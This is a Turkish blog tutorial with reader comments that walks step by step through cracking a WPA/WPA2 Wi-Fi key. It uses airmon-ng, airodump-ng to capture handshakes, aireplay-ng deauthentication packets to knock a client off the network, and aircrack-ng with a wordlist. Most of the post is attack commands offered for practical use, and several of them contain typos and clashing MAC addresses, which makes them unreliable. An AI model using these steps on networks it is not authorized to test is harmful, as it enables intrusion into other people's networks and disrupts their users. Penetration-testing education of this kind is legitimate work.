Kablosuz Ağları Kırmak ve Kablosuz Ağ Güvenliği 2 – WPA Crack

Kablosuz ağların güvenliği ve kırılması ile ilgili bir önceki yazımızda kablosuz ağ şifreleme algoritması olan WEP güvenliğine ve kırılmasına değinmiştik.Bu eğitim videosunu sitemizden online olarak izleyebildiğiniz gibi http://www.4shared.com/file/96X1unbu/wireless-hacking.html adresinden indirebilirsinizde. Şu ana kadar toplamda 2,530 ~ defa indirilmesi ve bu konuda aldığım mailler konunun hassasiyetini ortaya koyuyor : ))

Konunun devamı niteliğinde olan bu yazıda WPA/WPA2 paylaşımlı anahtarını kullanan networklerin nasıl kırılabileceğini uygulamalı olarak bulabilirsiniz.

Bazı terimler ve değerleri ;
Hedef ağa bağlı istemcinin MAC adresi : 00:1E:4C:43:A6:3E
BSSID (Access Point Cihazının MAC Adresi ) : 00:73:07:38:94:C7
ESSID (Kablosuz ağın ismi) : EVEREST
Access point kanal numarası : 11
Kablosuz ağ arabimi : wlan1

Basit haliyle saldırı adımları ;

  1. Kablosuz ağ arabirimi access pointin yayın yaptığı kanal için monitor moda alınır
  2. airodump-ng ile access point’in bulunduğu kanalı dinleyip authentication handshake paketlerini yakalamaya başlanır
  3. Wireless istemcisine aireplay-ng ile deuthentication paketleri göndererek wireless ağdan düşürülüp, tekrar bağlanması sağlanır
  4. aircrack-ng yazılımı çalıştırılarak authentication handshake paketlerinden paylaşımlı anahtar elde edilmeye çalışılır.

ADIM 1 : Wireless ağ arabirimini monitor moda almak
airmon-ng start wlan1 11

airmon-ng start wlan1 11 monitor mode

Adım 2 : airdump-ng ile auth. handshake paketlerinin yakalanması

Çevrede yayın yapan kablosuz ağları tespit etmek için ;
airodump-ng –channel 11 –encyrpt wpa wlan1

airodump-ng --encrypte wpa wlan1

11. kanalda wpa şifrelemesi ile yayın yapan EVEREST kablosuz ağını dinlemeye alıyoruz ;
airodump-ng –channel 11 –encyrpt wpa –bssid 00:14:6C:7E:40:80 -w lol wlan1

  • –channel parametresi ile kanal (channel) numarası belirtilir
  • –encyrpt parametresi ile şifreleme algoritması (wpa)  belirtilir
  • –bssid hedef Access Point’in mac adresi
  • -w ile yakalanan paketlerin yazılacağı dosya ismi

airodump-ng --channel 11 --encyrpt wpa --bssid 00:14:6C:7E:40:80 -w lol wlan1

Adım 3 : aireplay-ng ile wireless istemcisini kimlikdoğrulamaya zorlamak

Bu işlem opsiyoneldir, isterseniz bir istemcinin kablosuz ağa dahil olup handshake paketlerini yakalamayı bekleyebilirsiniz veya deauth. paketleri gönderip kablosuz ağa bağlı istemciniyi düşürüp tekrar bağlanmasını sağlayabilirsiniz böylelikle zaman kaybetmeden istiyacımız olan handshake paketini yakalamış oluruz. Detaylar burada = http://www.aircrack-ng.org/doku.php?id=deauthentication

aireplay-ng -0 5  -a 00:73:07:38:94:C7 -c 00:1E4C:43:A6:3E wlan1

  • -0  deauthentication paketi hazırlar
  • 5 toplam paket sayısı
  • -a Access point’in mac adresi
  • -c İstemcinin mac adresi
  • wlan1 kullanılacak ağ arabirimi

aireplay-ng -0 5  -a 00:73:07:38:94:C7 -c 00:1E4C:43:A6:3E wlan1

Bu adımı gerçekleştirdikden hemen sonra, deauth. saldırısı başarılımı ve  handshake yakalamışmıyız bakmak için airodump-ng ekranına geçiş yapabiliriz

airodump-ng handshake

Deuthentication ve Authentication paketlerinin detaylarını merak ediyorsanız, bu işlem sırasında wireshark ile paket analizi yapabilirsiniz.

wireshark deauthentication packages

wireshark wireless authentication packages

Adım 4:  airecrack-ng ile paylaşımlı anahtarın kırılması

Yakaladığımız paketlerden paylaşımlı anahtarı kırmak için geniş bir parola veritabanımız/sözlüğümüz olmalı. Eğer hedef sistemin parolası bizim sözlüğümüzde yoksa parolayı elde etmek bir ömür sürebilir.Bu için bakınız. “parola kırma teknikleri”

airecrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst -c lol-o1.cap

  • -w wordlist/sözlük/parola veritabanının yolunu belirtir
  • -c .cap dosyasının yolunu belirtir

airecrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst -c lol-o1.cap

Mutlu son : ))

    • Ali Kapucu
    • June 7th, 2010 5:06pm

    Güzel olmuş eline sağlık Ozan Hocam

    • Ali ŞAHİN
    • June 9th, 2010 12:53pm

    Alanında ilk döküman olması ve cehturkiye’de paylaşılması çok çok güzel birşey.Helede ozan hocam yazmışşa :) Zaman ayırıp uğraştığınız için teşekkür ederim hocam..

    • sinan
    • June 19th, 2010 8:14pm

    merhabalar bunu backtrack ‘ın hangi sürümüyle yaptınız ve parolanın bir kısmını wordlistte olsa dahil kırılmaz mı?

  1. Backtrack4 kullanıldıl.
    Aranan şifrenin tamamının wordlist’de olması gerekiyor.

    • Giray VARDAL
    • June 30th, 2010 8:11am

    worlisti Mysql veritabında tutup da bunu nasıl yol olarak gösterebiliriz.

  2. Hiç denemedim, hiç bir fikrim yok :/
    mysql’den wordlist’i export edip dosya yolunu göstermenizi deneyebilirsiniz.

    • Sasullah
    • June 22nd, 2011 10:48pm

    wordlistinizi bizimle paylaşırmısınız?

  3. İsterseniz aşağıdaki yazımızı takip ederek kendi wordlistinizi kolayca oluşturabilirsiniz.

    http://www.cehturkiye.com/index.php/2011/06/23/crunch-ile-wordlist-olusturmak/crunch-ile-wordlist-olusturmak.html

    • furkan
    • March 27th, 2012 8:33pm

    4 shared kapalı bana bu programı e mail yoluyla yollayabilecek bir hayır sever var mı
    :D

    • ozan
    • March 30th, 2012 3:55pm

    4shared.com da video var, program opensource ve aircrack-ng.com adresinden temin edilebilir.

    • moda
    • May 2nd, 2012 2:28pm

    teşekkürler denicem

    • moda
    • May 2nd, 2012 3:11pm

    hocam güzel anlatmışsında linux işletim sistemimi istiyor bunu yapabilmek icin ve shell i nereden bulabiliriz

  4. Backtrack 5 kurup videodaki aşamaları uygulayabilirsiniz. Aircrack-ng ailesi yazılımlar windows platformlarında da başarıyla çalışmaktadır, eğer ağ kartınız windows işletim sisteminde monitor modda çalışıyor ve paket enjeksiyonu destekliyorsa aynı komutlarla windows işletim sisteminde de çalışabilirsiniz.
    Bakınız ilgili kaynak: http://www.wirelessdefence.org/Contents/Aircrack-ng_WinMain.htm

  5. hocam linki yenilermisin türktelekom engellemiş siteyi

  1. No trackbacks yet.

 
Hosting Sponsorumuz